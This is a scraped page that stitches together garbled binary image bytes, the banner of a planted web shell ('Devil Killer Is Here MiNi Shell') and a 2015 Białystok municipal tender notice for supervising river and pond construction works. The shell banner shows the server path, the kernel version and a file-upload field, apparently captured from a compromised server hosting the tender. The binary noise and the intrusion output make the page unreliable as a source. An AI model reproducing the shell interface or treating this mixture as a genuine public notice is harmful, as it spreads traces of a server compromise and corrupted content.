JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151117/167621-N-2015.html

<p class="kh_header"><b>Białystok: Pełnienie funkcji inspektora nadzoru inwestorskiego w branży budowlano-konstrukcyjnej nad robotami budowlanymi w ramach Przebudowy koryta rzeki Białej od ul. Miłosza do ul. Pod Krzywą w Białymstoku oraz Odbudowy stawów przy ul. Marczukowskiej w Białymstoku wraz z budową obiektów towarzyszących</b><br>
<b>Numer ogłoszenia: 167621 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego w branży budowlano-konstrukcyjnej nad robotami budowlanymi w ramach Przebudowy koryta rzeki Białej od ul. Miłosza do ul. Pod Krzywą w Białymstoku oraz Odbudowy stawów przy ul. Marczukowskiej w Białymstoku wraz z budową obiektów towarzyszących.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego 
w branży budowlano-konstrukcyjnej nad robotami budowlanymi w ramach: 
1)	Przebudowy koryta rzeki Białej od ul. Miłosza do ul. Pod Krzywą w Białymstoku polegającej na:
a) Etap I:
- Wykonanie robót regulacyjnych, odtworzenie starorzeczy oraz likwidacja prostoliniowych odcinków rzeki przez ich zasypanie,
- Budowa oczka wodnego nr 1 o powierzchni 900 m2,
- Budowa oczka wodnego nr 2 o powierzchni 400 m2,
- Budowa 4 gródz ziemnych o wysokości 1,5 m.
b)	Etap II: 
- Budowa zastawki żelbetowej o wysokości piętrzenia 0,85 m i świetle 2,00 x 2,00 m,
- Budowa progu drewniano - kamiennego o wysokości 0,3 m i świetle 2,5 m.

2)	Odbudowy stawów przy ul. Marczukowskiej w Białymstoku wraz z budową obiektów towarzyszących, polegającej na:
a)	Etap II: 
Odbudowa i budowa stawów w tym:
- odbudowa stawu nr 2 z zimowiskiem, wyspą i plażą, 
- odbudowa stawu nr 1
- budowa stawu nr 3,
- budowa stawu nr 4,
- budowa doprowadzalnika nr A wraz z wylotem,
- budowa rurociągu odpływowego wraz z wlotem i wylotem,
- budowa zastawki,
- budowa mnicha,
- budowa studni rozdzielczej,
- odbudowa grobli A,
- budowa tarasu,
- budowa mostka.
- Budowa nawierzchni utwardzonych (ścieżek wokół stawów, placu serwisowego, chodnika)
- Budowa wieży ornitologicznej,
- Budowa obiektów małej architektury (altany, stolik, grill, ławki, kosze na śmieci, kontener na śmieci, stojaki na rowery).

2.	Szczegółowy zakres  robót  budowlanych  objętych  nadzorem  inwestorskim zawarty 
w dokumentacji projektowej znajduje się na stronie internetowej Zamawiającego: 
1)	Przebudowa koryta rzeki Białej od ul. Miłosza do ul. Pod Krzywą w Białymstoku: http://www.bip.bialystok.pl/736-szczegoly-zamowienia/lang/plPL/id/29Oi_m7Yksor5KW6Qmicjg2/back/733/default.aspx
2)	Odbudowa stawów przy ul. Marczukowskiej w Białymstoku wraz z budową obiektów towarzyszących: http://www.bip.bialystok.pl/736-szczegoly-zamowienia/lang/plPL/id/Y_hMIdet8HQrA1vAo0E6DQ2/back/733/default.aspx
3.	W ramach pełnienia funkcji inspektora nadzoru inwestorskiego w zakresie prac określonych w pkt 1 ppkt 1 lit. b oraz pkt 1 ppkt 2, do podstawowych obowiązków Wykonawcy należy w szczególności: 
1)	reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z projektem, zasadami wiedzy technicznej, obowiązującymi przepisami techniczno - budowlanymi, bhp, przeciwpożarowymi i normami oraz pozwoleniem 
na budowę; Wykonawca nadzorować będzie roboty budowlane na terenie budowy 
w takich odstępach czasu, aby zapewniona była skuteczność nadzoru oraz zależnie 
od potrzeb wykonawcy nadzorowanych robót budowlanych lub Zamawiającego, poprzez stawiennictwo na placu budowy (odnotowywane każdorazowo w dzienniku budowy) bądź w siedzibie Zamawiającego oraz na wezwanie Zamawiającego;
2)	sprawdzanie jakości wykonanych robót i wbudowanych materiałów budowlanych, 
co ma za zadanie zapobiegać zastosowaniu wadliwych i niedopuszczonych wyrobów budowlanych do stosowania w budownictwie;
3)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających;
4)		uczestniczenie w prowadzonych próbach  i  odbiorach  technicznych  instalacji,  urządzeń technicznych; 
5)		przygotowanie i uczestniczenie w czynnościach odbioru gotowych elementów obiektu;
6)	potwierdzanie faktycznie wykonanych robót;
7)	 potwierdzanie  usunięcia   przez    Wykonawcę    robót  budowlanych  ewentualnych   wad,  usterek, niedoróbek;
8)	zarządzanie realizacją postanowień  umowy  zawartej  z  Wykonawcą  robót  budowlanych;
9)	 prowadzenie regularnych inspekcji  na  terenie  budowy  w  celu  sprawdzenia   jakości wykonanych robót;
10)	 kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie wpisów;
11)	 identyfikowanie wszędzie gdzie jest to możliwe ryzyka powstania potencjalnych zagrożeń realizacji inwestycji i roszczeń ze strony Wykonawcy robót budowlanych oraz stron trzecich, a także  informowanie o tym Zamawiającego z propozycjami sposobów zapobiegania tym zagrożeniom i roszczeniom.
4. W zakresie prac określonych w pkt 1 ppkt 1 lit. a, do podstawowych obowiązków Wykonawcy należy w szczególności:
1)	sprawdzanie jakości wykonanych robót i wbudowanych materiałów budowlanych, 
co ma za zadanie zapobiegać zastosowaniu wadliwych i niedopuszczonych wyrobów budowlanych do stosowania w budownictwie;
2) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających;
3)	uczestniczenie w prowadzonych próbach  i  odbiorach  technicznych  instalacji,  urządzeń technicznych; 
4)	przygotowanie i uczestniczenie w czynnościach odbioru gotowych elementów obiektu;
5)	potwierdzanie faktycznie wykonanych robót;
6)	potwierdzanie  usunięcia   przez    Wykonawcę    robót  budowlanych  ewentualnych   wad,  usterek, niedoróbek;
7)	kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie wpisów;
8)	 identyfikowanie wszędzie gdzie jest to możliwe ryzyka powstania potencjalnych zagrożeń realizacji inwestycji i roszczeń ze strony Wykonawcy robót budowlanych oraz stron trzecich, a także  informowanie o tym Zamawiającego z propozycjami sposobów zapobiegania tym zagrożeniom i roszczeniom..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku Wykonawca winien wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert w niniejszym postępowaniu, 
a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie- wykonał 
co najmniej 1 usługę polegającą na nadzorowaniu robót budowlanych polegających na budowie, przebudowie lub remoncie zbiornika wodnego lub budowie budowli hydrotechnicznych lub odbudowie/regulacji rzeki, o wartości nadzorowanej inwestycji min. 50 000,00 zł, 
wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku Wykonawca winien wykazać, iż dysponuje co najmniej 1 osobą, która będzie uczestniczyć w wykonywaniu zamówienia, przewidzianą do pełnienia funkcji inspektora nadzoru inwestorskiego, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) lub odpowiadające im uprawnienia budowlane, które zostały wydane 
na podstawie wcześniej obowiązujących przepisów prawa albo uprawnienia 
do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa 
w specjalności konstrukcyjno-budowlanej, 
wraz z podaniem informacji na temat jej kwalifikacji zawodowych niezbędnych 
do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz  informacją  o  podstawie  do dysponowania tą osobą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 1) każdy Wykonawca
zobowiązany jest złożyć oddzielnie dokumenty określone w Sekcji III.4.2) tiret 2 oraz Sekcji III.4.4) tiret 1;
2) warunek dotyczący posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem
technicznym oraz osobami zdolnymi do wykonania zamówienia będzie badany łącznie- dokument
określony w Sekcji III.4.1) tiret 1-4 powinien złożyć co najmniej jeden z Wykonawców wspólnie
ubiegających się o udzielenie zamówienia; 3) oświadczenie o spełnieniu warunków udziału w
postępowaniu określone w Sekcji III.4.1) oraz oświadczenie o niepodleganiu wykluczeniu określone w
Sekcji III.4.2) tiret 1 składa pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia
w ich imieniu bądź każdy z Wykonawców oddzielnie. 2. Zgodnie z art. 26 ust. 2b ustawy, Wykonawca może
polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia,
zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego
łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić
Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności
przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (przedstawione w formie oryginału lub
notarialnie poświadczonej kopii) do oddania mu do dyspozycji niezbędnych zasobów na potrzeby
wykonania zamówienia (na lub wg zał. nr 5 do siwz) oraz dokumenty potwierdzające, że osoba podpisująca
takie zobowiązanie, była uprawniona do działania w imieniu podmiotu trzeciego (ewentualne
pełnomocnictwo należy składać w formie oryginału lub kopii poświadczonej notarialnie za zgodność z
oryginałem). Kopie dokumentów dotyczących podmiotu trzeciego muszą być poświadczone za zgodność z
oryginałem przez ten podmiot. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek
nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 3. W celu oceny,
czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego
wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje
rzeczywisty dostęp do ich zasobów, Zamawiający żąda złożenia dokumentów dotyczących w
szczególności: a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania
zasobów innego podmiotu, przez Wykonawcę przy wykonywaniu zamówienia, c) charakteru stosunku, jaki
będzie łączył Wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy
wykonywaniu zamówienia. Udostępnienie Wykonawcy potencjału wiedzy i doświadczenia przez podmiot
trzeci wiąże się z udziałem podmiotu trzeciego przy realizacji zamówienia, np. w formie podwykonawstwa,
konsultacji, doradztwa. 4. Dowodami, o których mowa w Sekcji III.4.1) tiret 1 są: 1) poświadczenie; 2)
oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn, o obiektywnym charakterze, Wykonawca nie
jest w stanie uzyskać poświadczenia, o którym mowa w ppkt 1. 5. W przypadku, gdy Zamawiający jest
podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa w Sekcji III.4.1) tiret 1, zostały
wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 4. 6.
Dokumenty podmiotów zagranicznych: 1) jeżeli w kraju miejsca zamieszkania osoby lub kraju, w którym
wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji
III.4.3.1) tiret 1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także
osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym,
administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca
zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed
notariuszem; 2) dokument, o którym mowa w Sekcji III.4.3.1) tiret 1 lub zastępujący go dokument, o którym
mowa w ppkt 1, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania
ofert; 3) w przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę
lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do
właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma
siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących
przedłożonego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas reakcji na wezwanie Zamawiającego do stawienia się na placu budowy/ w siedzibie Zamawiającego - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem
nieważności i będą dopuszczalne w granicach unormowania art. 144 ustawy z dnia 29 stycznia 2004 r.
Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późn. zm.). 2. Strony dopuszczają możliwość
zmiany istotnych postanowień umowy w stosunku do treści złożonej oferty zgodnie z zapisami § 3 ust. 2, §
4 ust. 2, § 10 ust. 2 i § 11 ust. 2 umowy. § 3 ust. 2: Strony dopuszczają zmianę terminu, o którym mowa w
ust. 1, w przypadku zmiany terminu realizacji zadań realizowanych przez Wykonawcę robót oraz w
następujących okolicznościach: 1) wykonania dodatkowych i niemożliwych do przewidzenia usług/robót,
których realizacja wiąże się z potrzebą zmiany terminu wykonania robót budowlanych; 2) siły wyższej; 3)
zmiany obowiązujących przepisów prawa; 4) przedłużającego się procesu inwestycyjnego; 5) wystąpienia
okoliczności, za które Wykonawca nie jest odpowiedzialny. § 4 ust. 2: Wykonawca może dokonywać
zmiany osoby przewidzianej do wykonywania zamówienia, wskazanej w ust. 1, jedynie za uprzednią zgodą
Zamawiającego. Zmiana osoby w trakcie realizacji przedmiotowej umowy musi być uzasadniona przez
Wykonawcę. Nowa osoba musi posiadać kwalifikacje zgodnie z warunkiem określonym w Rozdziale VI pkt
1 ppkt 3 siwz. § 10 ust. 2: Wykonawca może: 1) powierzyć realizację części przedmiotu umowy
podwykonawcom, mimo niewskazania w ofercie takiej części do powierzenia podwykonawcom; 2) wskazać
inny zakres podwykonawstwa niż przedstawiony w ofercie; 3) wskazać innych podwykonawców niż
przedstawieni w ofercie; 4) zrezygnować z podwykonawstwa. Jeżeli zmiana albo rezygnacja z
podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych
w art. 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w
postępowaniu, o których mowa w Rozdziale VI siwz, Wykonawca jest obowiązany wykazać
Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu
nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. § 11 ust. 2: Wykonawca
może dokonywać zmiany podmiotu trzeciego, o którym mowa w ust. 1, jedynie za uprzednią zgodą
Zamawiającego, akceptującego nowy podmiot. Nowy podmiot musi spełniać warunki określone w siwz w
zakresie jakim Wykonawca polegał na zasobach innych podmiotów na zasadach określonych w art. 26 ust.
2b ustawy. 3. Warunkiem dokonania zmiany, o której mowa w pkt 2, jest złożenie uzasadnionego wniosku
przez stronę inicjującą zmianę, wraz z opisem okoliczności stanowiących podstawę do dokonania takiej
zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Departament
Gospodarki Komunalnej Urzędu Miejskiego w Białymstoku, ul. Branickiego 9, pok. nr 117..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2015 godzina 08:30, miejsce: Urząd Miejski w Białymstoku, 15-950 Białystok, ul. Branickiego 9, pok. nr 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





